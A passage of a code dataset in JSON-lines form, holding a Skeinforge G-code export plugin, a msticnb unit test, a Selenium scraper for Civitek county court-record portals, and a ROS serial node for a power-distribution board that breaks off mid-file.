self)\n\t\tsettings.LabelDisplay().getFromName('SFACT WILL NOT WORK FROM WITHIN PRONTERFACE!!', self)\n\t\tself.addProfileExtension = settings.BooleanSetting().getFromValue('Add Profile Extension', self, False)\n\t\tself.addDescriptiveExtension = settings.BooleanSetting().getFromValue('Add Descriptive Extension', self, False)\n\t\tself.addTimestampExtension = settings.BooleanSetting().getFromValue('Add Timestamp Extension', self, False)\n\t\tself.executeTitle = 'Export'\n\n\tdef execute(self):\n\t\t'Export button has been clicked.'\n\t\tfileNames = skeinforge_polyfile.getFileOrDirectoryTypesUnmodifiedGcode(self.fileNameInput.value, fabmetheus_interpret.getImportPluginFileNames(), self.fileNameInput.wasCancelled)\n\t\tfor fileName in fileNames:\n\t\t\twriteOutput(fileName)\n\n\nclass ExportSkein:\n\t'A class to export a skein of extrusions.'\n\tdef __init__(self):\n\t\tself.crafting = False\n\t\tself.decimalPlacesExported = 2\n\t\tself.output = cStringIO.StringIO()\n\n\tdef addLine(self, line):\n\t\t'Add a line of text and a newline to the output.'\n\t\tif line != '':\n\t\t\tself.output.write(line + '\\n')\n\n\tdef getCraftedGcode( self, repository, gcodeText ):\n\t\t'Parse gcode text and store the export gcode.'\n\t\tself.repository = repository\n\t\tlines = archive.getTextLines(gcodeText)\n\t\tfor line in lines:\n\t\t\tself.parseLine(line)\n\t\treturn self.output.getvalue()\n\n\tdef getLineWithTruncatedNumber(self, character, line, splitLine):\n\t\t'Get a line with the number after the character truncated.'\n\t\tnumberString = gcodec.getStringFromCharacterSplitLine(character, splitLine)\n\t\tif numberString is None:\n\t\t\treturn line\n\t\troundedNumberString = euclidean.getRoundedToPlacesString(self.decimalPlacesExported, float(numberString))\n\t\treturn gcodec.getLineWithValueString(character, line, splitLine, roundedNumberString)\n\n\tdef parseLine(self, line):\n\t\t'Parse a gcode line.'\n\t\tsplitLine = gcodec.getSplitLineBeforeBracketSemicolon(line)\n\t\tif len(splitLine) < 1:\n\t\t\treturn\n\t\tfirstWord = splitLine[0]\n\t\tif firstWord == '()':\n\t\t\tself.crafting = False\n\t\telif firstWord == '(':\n\t\t\tself.decimalPlacesExported = int(splitLine[1]) - 1\n\t\tif self.repository.deleteAllComments.value or (self.repository.deleteCraftingComments.value and self.crafting):\n\t\t\tif firstWord[0] == '(':\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tline = line.split(';')[0].split('(')[0].strip()\n\t\tif firstWord == '()':\n\t\t\tself.crafting = True\n\t\tif firstWord == '()':\n\t\t\tself.addLine(gcodec.getTagBracketedProcedure('export'))\n\t\tif firstWord != 'G1' and firstWord != 'G2' and firstWord != 'G3' :\n\t\t\tself.addLine(line)\n\t\t\treturn\n\t\tline = self.getLineWithTruncatedNumber('X', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('Y', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('Z', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('I', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('J', line, splitLine)\n\t\tline = self.getLineWithTruncatedNumber('R', line, splitLine)\n\t\tself.addLine(line)\n\n\ndef main():\n\t'Display the export dialog.'\n\tif len(sys.argv) > 1:\n\t\twriteOutput(' '.join(sys.argv[1 :]))\n\telse:\n\t\tsettings.startMainLoopFromConstructor(getNewRepository())\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"skeinforge_application/skeinforge_plugins/craft_plugins/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":21278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"602710057","text":"# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\"\"\"Test the nb_template class.\"\"\"\nfrom pathlib import Path\n\n# from contextlib import redirect_stdout\nimport unittest\n\nimport pandas as pd\n\nfrom msticnb.common import TimeSpan\nfrom msticnb import nblts\nfrom msticnb.data_providers import init\n\nfrom ....unit_test_lib import TEST_DATA_PATH\n\n\n# pylint: disable=no-member\n\n\nclass TestWinHostEvents(unittest.TestCase):\n \"\"\"Tests for nb_template.\"\"\"\n\n def test_winhostevents_notebooklet(self):\n \"\"\"Test basic run of notebooklet.\"\"\"\n test_data = str(Path(TEST_DATA_PATH).absolute())\n init(\n query_provider=\"LocalData\",\n LocalData_data_paths=[test_data],\n LocalData_query_paths=[test_data],\n )\n\n test_nb = nblts.azsent.host.WinHostEvents()\n tspan = TimeSpan(period=\"1D\")\n\n result = test_nb.run(value=\"myhost\", timespan=tspan)\n self.assertIsNotNone(result.all_events)\n self.assertIsInstance(result.all_events, pd.DataFrame)\n self.assertIsNotNone(result.event_pivot)\n self.assertIsInstance(result.event_pivot, pd.DataFrame)\n self.assertIsNotNone(result.account_events)\n self.assertIsInstance(result.account_events, pd.DataFrame)\n self.assertIsNotNone(result.event_pivot)\n self.assertIsInstance(result.event_pivot, pd.DataFrame)\n # self.assertIsNotNone(result.account_timeline)\n\n exp_events = test_nb.expand_events([\"5058\", \"5061\"])\n self.assertIsInstance(exp_events, pd.DataFrame)\n","sub_path":"tests/nb/azsent/host/test_win_host_events.py","file_name":"test_win_host_events.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"445123067","text":"from selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import MoveTargetOutOfBoundsException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.select import Select\n\nimport time\nimport os\nimport json\n\nfrom county_fns import create_driver as create_driver\nfrom county_fns import scroll\nfrom county_processor import CountyProcessor\nfrom county_processor import DocumentException\nfrom dynamo_interface import *\nfrom file_processor import DownloadException\nfrom file_processor import FileProcessor\nfrom slogger import sLogger\n\n\"\"\"\n\tGLOBAL VARIABLES\n\"\"\"\nDOCUMENT_NAME = 'docketimage'\nDOCUMENT_FILE_EXTENSION = 'pdf'\n\n# Public Page - Xpath for Public Button\nPUBLIC_PAGE_PUBLIC_BUTTON_XPATH = '//form/div/table/tbody/tr[1]/td[1]/button'\n# Disclaimer Page - Element ID for Agree Button\nDISCLAIMER_PAGE_AGREE_BUTTON_ID = 'j_idt42:j_idt44'\n# Search Form Page - Xpath to Captcha\nSEARCH_PAGE_CAPTCHA_XPATH = '//*[@title=\"recaptcha challenge\"]'\n# Search Form Page - Element ID to business name input\nSEARCH_PAGE_BUSINESS_INPUT_ID = 'form:search_tab:businessname'\n# Search Form Page - Element ID to From Date input\nSEARCH_PAGE_FROM_DATE_INPUT_ID = 'form:search_tab:fromDate_input'\n# Search Form Page - Element ID to To Date input\nSEARCH_PAGE_TO_DATE_INPUT_ID = 'form:search_tab:toDate_input'\n# Search Form Page - Element ID to Display Cases Radio Button\n#SEARCH_PAGE_DISPLAY_CASES_BUTTON_ID = 'form:search_tab:console:1'\nsearCH_PAGE_DISPLAY_CASES_X_PATH = '/html/body/div[1]/div[1]/form[2]/div[1]/div/div[1]/div[3]/table/tbody/tr/td[2]/div/div[2]/span'\n# Search Form Page - Xpath to Search button\nSEARCH_PAGE_SEARCH_BUTTON_XPATH = '//form[@id=\"form\"]/div[3]/button[span=\"Search\"]'\n# Results Page - Xpath to Data Table Head\nRESULTS_PAGE_DATE_COL_HEAD_XPATH = '//thead[@id=\"partyResultsDisplayByCases:partySRDisplayByCasesTable_head\"]/tr[1]/th[3]'\n# Results Page - Xpath to rows of table of cases\nRESULTS_PAGE_TABLE_ROWS_XPATH = '/html/body/div[1]/div[1]/form[2]/div[2]/div/table/tbody/tr'\n# Results Page - Xpath to each case link in table of cases\nRESULTS_PAGE_TABLE_ROW_CASE_LINK_XPATH = '/html/body/div[1]/div[1]/form[2]/div[2]/div/table/tbody/tr[{}]/td[3]/a'\n# Case Page - ID select dropdown for number of dockets visible\nCASE_PAGE_NUM_DOCKETS_SELECT_ID = 'form:docketDataTable1:j_id2'\n# Case Page - Table header ID for extended list view\nCASE_PAGE_THEAD_PAGINATOR = 'form:docketDataTable1_paginator_top'\n# Case Page - Xpath to Docket paginator next button in disabled state\nCASE_PAGE_THEAD_PAGINATOR_NEXT_DISABLED_XPATH = '//div[@id=\"form:docketDataTable1_paginator_top\"]/a[contains(@class, \"ui-state-disabled\")][3]'\n# Case Page - Xpath to rows of table of dockets\nCASE_PAGE_DOCKET_TABLE_ROWS_XPATH = '//tbody[@id=\"form:docketDataTable1_data\"]/tr'\n# Case Page - Xpath to docket row\nCASE_PAGE_DOCKET_TABLE_ROW_XPATH = '//tbody[@id=\"form:docketDataTable1_data\"]/tr[{}]'\n# Case Page - Xpath modifier to docket image\nCASE_PAGE_DOCKET_IMAGE_XPATH_MODIFIER = './/td[1]/a[@title=\"docketImage\"]'\n# Case Page - Xpath modifier to docket request\nCASE_PAGE_DOCKET_REQ_XPATH_MODIFIER = './/td[1]/button[@title=\"Request Image\"]'\n# Case Page - Xpath modifier to restricted document\nCASE_PAGE_DOCKET_RESTRICTED_XPATH_MODIFIER = './/td[1]/button[@title=\"Request Image\"]'\n# Case Page - Xpath modifier to docket number\nCASE_PAGE_DOCKET_NUM_XPATH_MODIFIER = './/td[2]'\n# Case Page - Xpath modifier to docket description\nCASE_PAGE_DOCKET_DESCR_XPATH_MODIFIER = './/td[4]'\n# Case Page - Xpath modifier to docket availability if docket available\nCASE_PAGE_DOCKET_AVAIL_XPATH_MODIFIER_V1 = '//*[@alt=\"viewDocket\"]'\n# Case Page - Xpath modifier to docket availability if docket can be requested\nCASE_PAGE_DOCKET_AVAIL_XPATH_MODIFIER_V2 = '//*[@title=\"Request Image\"]'\n\n\"\"\"\n\tData Gather for Counties using Civitek\n\"\"\"\nclass CivitekProcessor(CountyProcessor):\n\n\t\"\"\"\n\t\tConstructor\n\t\"\"\"\n\tdef __init__(self, county_name, website, download_folder, document_description):\n\t\tsuper().__init__(county_name, website, download_folder, document_description)\n\n\t\tself._default_doc_name = DOCUMENT_NAME\n\t\tself.county_name = county_name\n\n\n\t\"\"\"\n\t\tExecute scraper\n\t\"\"\"\n\tdef execute(self, search_term, from_date, to_date):\n\n\t\ttry:\n\t\t\t# Access Public\n\t\t\tself.publicPageAccess()\n\t\t\t# Access Disclaimer\n\t\t\tself.disclaimerPageAccess()\n\t\t\t# Access Search\n\t\t\tself.searchPageAccess(search_term, from_date, to_date)\n\t\t\t# Process Search\n\t\t\tself.handle_cases()\n\n\t\t\tself.logger.info('INFO: Finished search.')\n\n\t\tfinally:\n\t\t\tself._driver.quit()\n\n\t\"\"\"\n\t\tProcesses Access Records Page for public access\n\t\"\"\"\n\tdef publicPageAccess(self):\n\t\t# Get PUBLIC button and click\n\t\tpublicBtn = self.wait_get_element_located(By.XPATH, PUBLIC_PAGE_PUBLIC_BUTTON_XPATH, 30)\n\t\tself.scroll_click(publicBtn)\n\n\t\"\"\"\n\t\tProcesses Disclaimer Page\n\t\"\"\"\n\tdef disclaimerPageAccess(self):\n\t\t# Check that Disclaimer page has loaded\n\t\tself.wait_get_element_located(By.XPATH, '//h3', 30)\n\t\t# Get AGREE button and click\n\t\tdisclaimerBtn = self.wait_get_element_located(By.ID, DISCLAIMER_PAGE_AGREE_BUTTON_ID, 10)\n\t\tself.scroll_click(disclaimerBtn)\n\n\t\"\"\"\n\t\tProcesses search page\n\t\"\"\"\n\tdef searchPageAccess(self, search_term, start_date, end_date):\n\t\ttime.sleep(25)\n\t\t# Handle CAPTCHA by allowing user input\n\t\tWebDriverWait(self._driver, 10).until(EC.invisibility_of_element_located((By.XPATH, SEARCH_PAGE_CAPTCHA_XPATH)))\n\n\t\t# Input business search term\n\t\tself.wait_get_element_located(By.ID, SEARCH_PAGE_BUSINESS_INPUT_ID, 10).send_keys(search_term)\n\n\t\t# Input from date mm/dd/yyyy\n\t\tself.wait_get_element_located(By.ID, SEARCH_PAGE_FROM_DATE_INPUT_ID, 10).send_keys(start_date)\n\n\t\t# Input to date mm/dd/yyyy\n\t\tself.wait_get_element_located(By.ID, SEARCH_PAGE_TO_DATE_INPUT_ID, 10).send_keys(end_date)\n\n\t\t# Check Display Cases Input\n\t\tdisplayCasesRadioBtn = self.wait_get_element_located(By.XPATH, searCH_PAGE_DISPLAY_CASES_X_PATH, 10)\n\t\tself.scroll_click(displayCasesRadioBtn)\n\n\t\t# Search\n\t\tsearchBtn = self.wait_get_element_located(By.XPATH, SEARCH_PAGE_SEARCH_BUTTON_XPATH, 10)\n\t\tself.scroll_click(searchBtn)\n\n\t\tself.logger.info('Searching for {} from {} to {}.'.format(search_term, start_date, end_date))\n\n\t\"\"\"\n\t\tFind all cases in search results\n\t\"\"\"\n\tdef handle_cases(self):\n\t\ttime.sleep(5)\n\t\t# Check results page has loaded\n\t\tself.wait_element_text_present(By.TAG_NAME, 'h2', 'Search Results')\n\n\t\t# Find number of cases and loop through each case\n\t\tnum_cases = len(self._driver.find_elements_by_xpath(RESULTS_PAGE_TABLE_ROWS_XPATH))\n\t\tself.process_cases_page(1, num_cases, RESULTS_PAGE_TABLE_ROWS_XPATH, RESULTS_PAGE_TABLE_ROW_CASE_LINK_XPATH, 1, False)\n\n\t\"\"\"\n\t\tProcess Case Number\n\t\"\"\"\n\tdef process_case(self, case_number):\n\n\t\t# Toggle number of dockets to 'ALL'\n\t\tself.toggle_docket_dropdown()\n\n\t\t# Get number of documents\n\t\tnum_dockets = len(self._driver.find_elements_by_xpath(CASE_PAGE_DOCKET_TABLE_ROWS_XPATH))\n\n\t\tself.logger.info('Case {} has {} documents.'.format(case_number, num_dockets))\n\n\t\t# Process case documents\n\t\tself.get_case_documents(case_number, 1, num_dockets, CASE_PAGE_DOCKET_TABLE_ROWS_XPATH)\n\n\t\"\"\"\n\t\tToggle dropdown to display 'ALL' dockets\n\t\"\"\"\n\tdef toggle_docket_dropdown(self):\n\t\t# Toggle number of dockets to 'ALL'\n\t\ttry:\n\t\t\tif self.wait_get_element_located(By.ID, CASE_PAGE_THEAD_PAGINATOR):\n\t\t\t\tselectDropDown = WebDriverWait(self._driver, 5).until(lambda x=self._driver:Select(x.find_element_by_id(CASE_PAGE_NUM_DOCKETS_SELECT_ID)))\n\t\t\t\tselectDropDown.select_by_index(4)\n\t\t\t\t# Wait until next button becomes disabled\n\t\t\t\tself.wait_get_element_located(By.XPATH, CASE_PAGE_THEAD_PAGINATOR_NEXT_DISABLED_XPATH, 20)\n\t\texcept TimeoutException:\n\t\t\t# Paginator doesn't exist, because not enough dockets\n\t\t\tself.logger.info('Docket table paginator doesn\\'t exist, continuing...')\n\t\t\tpass\n\t\texcept NoSuchElementException:\n\t\t\tself._driver.back()\n\t\t\traise TimeoutException('Unable to locate docket dropdown.')\n\n\t\"\"\"\n\t\tGet Document for case and download\n\n\t\t:param docket_row - Document Row Element\n\t\t:param case_num - Case Number\n\t\t:param doc_iterator - Document Counter\n\t\t:param num_dockets - Total number of documents for the case\n\t\"\"\"\n\tdef process_document(self, docket_row, case_num, doc_iterator, num_dockets):\n\t\t# Get Docket Description\n\t\tdocket_descr = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_DESCR_XPATH_MODIFIER).text\n\t\tif self.matches_document_description(docket_descr):\n\t\t\t\t# Get Docket\n\t\t\t\tdocket = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_IMAGE_XPATH_MODIFIER)\n\t\t\t\t# Get Docket Number\n\t\t\t\tdocket_num = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_NUM_XPATH_MODIFIER).text\n\t\t\t\t# Download\n\t\t\t\tself.scroll_click(docket)\n\t\t\t\t# Rename File\n\t\t\t\tself.rename_file(case_num, docket_descr, docket_num, 240)\n\t\t\t\tself.logger.info('{}/{} downloaded: document \\\"{}\\\" for case # {}, docket # {}.'.format(doc_iterator+1, num_dockets, docket_descr, case_num, docket_num))\n\t\telse:\n\t\t\traise DocumentException('Document description {} did not match {}.'.format(docket_descr, self._match_document_description))\n\n\n\"\"\"\n\tClass to find files that need to be requested and submitting requests\n\"\"\"\nclass CivitekFileRequester(CivitekProcessor):\n\t\n\t_request_made = False\n\n\t\"\"\"\n\t\tProcess Case Number\n\t\"\"\"\n\tdef process_case(self, case_number):\n\t\tsuper().process_case(case_number)\n\t\t# Sleep 1 minute if case requests have been made\n\t\tif self._request_made:\n\t\t\ttime.sleep(120)\n\t\t\tself._request_made = False\n\n\t\"\"\"\n\t\tRequest locked document\n\n\t\t:param docket_row - Document Row Element\n\t\t:param case_num - Case Number\n\t\t:param doc_iterator - Document Counter\n\t\t:param num_dockets - Total number of documents for the case\n\t\"\"\"\n\tdef process_document(self, docket_row, case_num, doc_iterator, num_dockets):\n\t\t# Readjust show all documents\n\t\tif self._request_made:\n\t\t\tself.toggle_docket_dropdown()\n\t\t# Get docket row again due to page refresh after requesting document\n\t\tdocket_row = self.wait_get_element_located(By.XPATH, CASE_PAGE_DOCKET_TABLE_ROW_XPATH.format(doc_iterator))\n\t\t# Get Docket Description\n\t\tdocket_descr = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_DESCR_XPATH_MODIFIER).text\n\t\tif self.matches_document_description(docket_descr):\n\t\t\t# Get Docket Request\n\t\t\tdocket = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_REQ_XPATH_MODIFIER)\n\t\t\t# Get Docket Number\n\t\t\tdocket_num = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_NUM_XPATH_MODIFIER).text\n\t\t\t# Download\n\t\t\tself.scroll_click(docket)\n\t\t\tself.process_request()\n\t\t\tself.logger.info('{}/{} requested: document \\\"{}\\\" for case # {}.'.format(doc_iterator+1, num_dockets, docket_descr, case_num))\n\t\telse:\n\t\t\traise DocumentException('Document description {} did not match {}.'.format(docket_descr, self._match_document_description))\n\n\tdef process_request(self):\n\t\t# Checkbox\n\t\tself.wait_get_element_clickable(By.XPATH, '//div[@id=\"vor_checkBox\"]/div[2]/span').click()\n\t\t# Get input name\n\t\tself.wait_get_element_located(By.XPATH, '//table[@id=\"vor_panel\"]/tbody/tr[1]/td[2]/input').send_keys('Rob Quin')\n\t\t# Get input email\n\t\tself.wait_get_element_located(By.XPATH, '//table[@id=\"vor_panel\"]/tbody/tr[2]/td[2]/input').send_keys('help@billmoretech.com')\n\t\t# Click\n\t\tself.scroll_click(self.wait_get_element_clickable(By.XPATH, '//div[@id=\"vorContent\"]/button[1]'))\n\t\ttime.sleep(5)\n\t\tself.scroll_click(self.wait_get_element_clickable(By.XPATH, '//div[@id=\"vorSuccessMsg\"]/button'))\n\t\ttime.sleep(10)\n\t\tself._request_made = True\n\n\t\t\n\"\"\"\n\tCounty metadata scraper, uploading to database\n\"\"\"\nclass CivitekDataGather(CivitekProcessor):\n\n\t\"\"\"\n\t\tConstructor\n\t\"\"\"\n\tdef __init__(self, county_name, website, download_folder, document_description):\n\t\tsuper().__init__(county_name, website, download_folder, document_description)\n\n\t\tself.database = DynamoInterface()\n\n\t\tself.logger.info('Running data gather for {} county.'.format(county_name))\n\n\tdef execute(self, search_term, start_date, end_date):\n\t\tself.search_term = search_term\n\t\tsuper().execute(search_term, start_date, end_date)\n\n\tdef process_case(self, case_num):\n\t\tsuper().process_case(case_num)\n\n\t\tself.logger.info('Writing case {} to database.'.format(case_num))\n\t\t# Insert cases object into database\n\t\tself.database.insert_case_object(self.database.create_case_object(\n\t\t\tself.county_name,\n\t\t\tCompanyInterface.get_company_name(self.search_term),\n\t\t\tcase_num))\n\n\t\"\"\"\n\t\tGet the metadata that explains which Documents are available for download by case\n\n\n\t\t:param docket_row - Document Row Element\n\t\t:param case_num - Case Number\n\t\t:param doc_iterator - Document Counter\n\t\t:param num_dockets - Total number of documents for the case\n\t\"\"\"\n\n\tdef process_document(self, docket_row, case_num, doc_iterator, num_dockets):\n\t\t\n\t\tavailability = DocumentInterface.UNAVAILABLE\n\t\ttry:\n\t\t\t# Check document available\n\t\t\tdocket_row.find_element_by_xpath(CASE_PAGE_DOCKET_IMAGE_XPATH_MODIFIER)\n\t\t\tavailability = DocumentInterface.AVAILABLE\n\t\texcept NoSuchElementException:\n\t\t\tpass\n\t\ttry:\n\t\t\t#Check document \n\t\t\tdocket_row.find_element_by_xpath(CASE_PAGE_DOCKET_RESTRICTED_XPATH_MODIFIER)\n\t\t\tavailability = DocumentInterface.RESTRICTED\n\t\texcept NoSuchElementException:\n\t\t\tpass\n\n\t\t# Get Docket Description\n\t\tdescription = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_DESCR_XPATH_MODIFIER).text\n\n\t\t# Get Docket Number\n\t\tdocket_num = docket_row.find_element_by_xpath(CASE_PAGE_DOCKET_NUM_XPATH_MODIFIER).text\n\t\tif not docket_num or docket_num == '':\n\t\t\tdocket_num = doc_iterator\n\t\telse:\n\t\t\tdocket_num = int(docket_num)\n\n\t\tname = FileProcessor.new_file_name(self.county_name, case_num, description, docket_num, '.' + DOCUMENT_FILE_EXTENSION)\n\n\t\t# Upload document data\n\t\tself.database.insert_document_object(self.database.create_document_object(\n\t\t\tname,\n\t\t\tcase_num,\n\t\t\tdocket_num,\n\t\t\tdescription,\n\t\t\tDOCUMENT_FILE_EXTENSION, \n\t\t\tavailability))\n\n","sub_path":"civitek_processor.py","file_name":"civitek_processor.py","file_ext":"py","file_size_in_byte":14185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"89874623","text":"#! /usr/bin/env python3\n\nimport sys\nimport traceback\nimport time\nimport re\n\nimport serial # pyserial\nimport serial.tools.list_ports # pyserial\n#from robot.comms.uart import Uart\n#import from mcuSerial import McuSerial # this isn't anything yet, just a copy of uart.py\n\nimport rospy\nfrom std_msgs.msg import String, Float32\nfrom geometry_msgs.msg import Point\nfrom sensor_msgs.msg import JointState\nfrom mcu_control.srv import *\n\nglobal ser # make global so it can be used in other parts of the code\nmcuName = 'PDS'\n\n# 300 ms timeout... could potentially be even less, needs testing\ntimeout = 1 # to wait for a response from the MCU\n\n# todo: test ros+website over network with teensy\n# todo: make a MCU serial class that holds the port initialization stuff and returns a reference?\n# todo: put similar comments and adjustments to code in the publisher and server demo scrips once finalized\n\n# setup serial communications by searching for arm teensy if USB, or simply connecting to UART\ndef init_serial():\n baudrate = 9600\n # in a perfect world, you can choose the baudrate\n rospy.loginfo('Using %d baud by default', baudrate)\n # in a perfect world, usb vs uart will be set by ROS params\n usb = False\n uart = True\n myargv = rospy.myargv(argv=sys.argv)\n if len(myargv) == 1:\n rospy.loginfo('Using UART by default')\n if len(myargv) > 1:\n if myargv[1] == 'uart':\n usb = False\n uart = True\n rospy.loginfo('Using UART and 9600 baud by default')\n elif myargv[1] == 'usb':\n usb = True\n uart = False\n rospy.loginfo('Using USB and 9600 baud by default')\n else:\n rospy.logerr('Incorrect argument: expecting \"usb\" or \"uart\"')\n sys.exit(0)\n\n global ser #make global so it can be used in other parts of the code\n\n ports = list(serial.tools.list_ports.comports())\n\n startConnecting = time.time()\n if usb:\n baudrate = 19200\n if len(ports) > 0:\n rospy.loginfo(\"%d USB device(s) detected\", len(ports))\n for portObj in ports:\n port = portObj.name\n rospy.loginfo('Attempting to connect to /dev/' + port)\n ser = serial.Serial('/dev/' + port, baudrate)\n\n rospy.loginfo(\"clearing buffer...\")\n while ser.in_waiting:\n ser.readline()\n\n rospy.loginfo(\"identifying MCU by sending 'who' every %d ms\", timeout * 1000)\n for i in range(5):\n rospy.loginfo('attempt #%d...', i + 1)\n startListening = time.time()\n ser.write(str.encode('who\\n'))\n while time.time() - startListening < timeout:\n if ser.in_waiting: # if there is data in the serial buffer\n response = ser.readline().decode()\n rospy.loginfo('response: ' + response)\n if mcuName in response:\n rospy.loginfo(mcuName + \" MCU identified!\")\n rospy.loginfo(\n 'timeout: %f ms', (time.time() - startListening) * 1000\n )\n rospy.loginfo(\n 'took %f ms to find the ' + mcuName + ' MCU',\n (time.time() - startConnecting) * 1000\n )\n return\n else:\n rospy.logerr(\"No USB devices recognized, exiting\")\n sys.exit(0)\n\n elif uart:\n port = 'ttySAC0'\n rospy.loginfo('Attempting to connect to /dev/' + port)\n try:\n ser = serial.Serial('/dev/' + port, baudrate)\n except:\n rospy.logerr('No UART device recognized, terminating PDS node')\n sys.exit(0)\n\n rospy.loginfo(\"clearing buffer...\")\n while ser.in_waiting:\n ser.readline()\n\n rospy.loginfo(\"identifying MCU by sending 'who' every %d ms\", timeout * 1000)\n for i in range(1, 6):\n rospy.loginfo('attempt #%d...', i)\n startListening = time.time()\n ser.write(str.encode('who\\n'))\n while time.time() - startListening < timeout:\n if ser.in_waiting:\n dat = ''\n data = None\n try:\n #dat = ser.readline().decode()\n data = ser.readline().decode()\n #data = stripFeedback(dat)\n except Exception as e:\n print(\"type error: \" + str(e))\n rospy.logwarn('trouble reading from serial port')\n if data is not None:\n if mcuName in data:\n rospy.loginfo(mcuName + \" MCU identified!\")\n rospy.loginfo('timeout: %f ms', (time.time() - startListening) * 1000)\n rospy.loginfo(\n 'took %f ms to find the ' + mcuName + ' MCU',\n (time.time() - startConnecting) * 1000\n )\n return\n else:\n rospy.loginfo('got raw message: ' + dat)\n\n rospy.logerr('Incorrect MCU connected, terminating listener')\n sys.exit(0)\n\nrequests = {\n 'PDS T 1' : ['ON'],\n 'PDS T 0' : ['OFF'],\n #'who' : ['pds'], #@TODO: MCU code can't handle this request, fix it\n 'PDS M 1 1' : ['toggling'],\n 'PDS M 1 0' : ['toggling'],\n 'PDS M 2 1' : ['toggling'],\n 'PDS M 2 0' : ['toggling'],\n 'PDS M 3 1' : ['toggling'],\n 'PDS M 3 0' : ['toggling'],\n 'PDS M 4 1' : ['toggling'],\n 'PDS M 4 0' : ['toggling'],\n 'PDS M 5 1' : ['toggling'],\n 'PDS M 5 0' : ['toggling'],\n 'PDS M 6 1' : ['toggling'],\n 'PDS M 6 0' : ['toggling']\n}\ndef handle_client(req):\n global ser # specify that it's global so it can be used properly\n global reqFeedback\n global reqInWaiting\n pdsResponse = ArmRequestResponse()\n timeout = 0.3 # 300ms timeout\n reqInWaiting = True\n sinceRequest = time.time()\n rospy.loginfo('received '+req.msg+' request from GUI, sending to PDS MCU')\n ser.write(str.encode(req.msg+'\\n')) # ping the teensy\n while pdsResponse.success is False and (time.time()-sinceRequest < timeout):\n if reqFeedback is not '':\n for request in requests:\n for response in requests[request]:\n if request == req.msg and response in reqFeedback:\n pdsResponse.response = reqFeedback\n pdsResponse.success = True #a valid request and a valid response from the\n break\n if pdsResponse.success:\n break\n else:\n pdsResponse.response = reqFeedback\n rospy.Rate(100).sleep()\n rospy.loginfo('took '+str(time.time()-sinceRequest)+' seconds, sending this back to GUI: ')\n rospy.loginfo(pdsResponse)\n reqFeedback=''\n reqInWaiting=False\n return pdsResponse\n\ndef subscriber_callback(message):\n global ser # specify that it's global so it can be used properly\n rospy.loginfo('received: ' + message.data + ' command from GUI, sending to PDS')\n command = str.encode(message.data + '\\n')\n ser.write(command) # send command to PDS\n return\n\ndef publish_pds_data(message):\n # parse the data received from PDS\n # converts message from string to float\n dataPDS = message.split(',') ###returns an array of ALL data from the PDS\n # create the message to be published\n voltage = Float32()\n current = JointState()\n temp = Point()\n fanSpeeds = Point()\n try:\n for i in range(12):\n if i < 1:\n voltage.data = float(dataPDS[i])\n rospy.loginfo('voltage=' + dataPDS[i])\n elif i < 7:\n current.effort.append(float(dataPDS[i]))\n elif i < 10:\n temp.x = float(dataPDS[7])\n temp.y = float(dataPDS[8])\n temp.z = float(dataPDS[9])\n else:\n fanSpeeds.x = float(dataPDS[10])\n fanSpeeds.y = float(dataPDS[11])\n\n temps = ''\n for i in [dataPDS[7], dataPDS[8], dataPDS[9]]:\n temps += i.strip() + ','\n temps = temps[:-1]\n rospy.loginfo('temps=' + temps)\n\n # motor currents\n currents = ''\n for i in current.effort:\n currents += str(i).strip() + ','\n currents = currents[:-1]\n\n rospy.loginfo('currents=' + currents)\n # battery voltage\n voltagePub.publish(voltage)\n # 6 motor currents from M0-M5\n currentPub.publish(current)\n # temperatures of the battery\n tempPub.publish(temp)\n fanSpeedsPub.publish(fanSpeeds)\n nada,firstFlag = dataPDS[12].split(' ')\n flagsMsg = firstFlag+','+dataPDS[13]+','+dataPDS[14].strip('\\r')\n flagsPub.publish(flagsMsg)\n except Exception as e:\n print(\"type error: \" + str(e))\n rospy.logwarn('trouble parsing PDS sensor data')\n return\n return\n\ndef stripFeedback(data):\n startStrips = ['PDS ', 'Command', 'Motor']\n endStrips = ['\\r\\n', '\\n']\n for strip in startStrips:\n if data.startswith(strip) and data.count(strip) == 1:\n try:\n data, right = data.split(endStrips[0])\n except:\n pass\n try:\n data, right = data.split(endStrips[1])\n except:\n pass\n #left, data = data.split(startStrip)\n return data\n return None\n\nif __name__ == '__main__':\n node_name = 'pds_node'\n rospy.init_node(node_name, anonymous=False) # only allow one node of this type\n rospy.loginfo('Initialized \"' + node_name + '\" node for pub/sub/service functionality')\n\n voltage_pub_topic = '/battery_voltage'\n rospy.loginfo('Beginning to publish to \"' + voltage_pub_topic + '\" topic')\n voltagePub = rospy.Publisher(voltage_pub_topic, Float32, queue_size=10)\n\n current_pub_topic = '/wheel_motor_currents'\n rospy.loginfo('Begining to publish to \"' + current_pub_topic + '\" topic')\n currentPub = rospy.Publisher(current_pub_topic, JointState, queue_size=10)\n\n 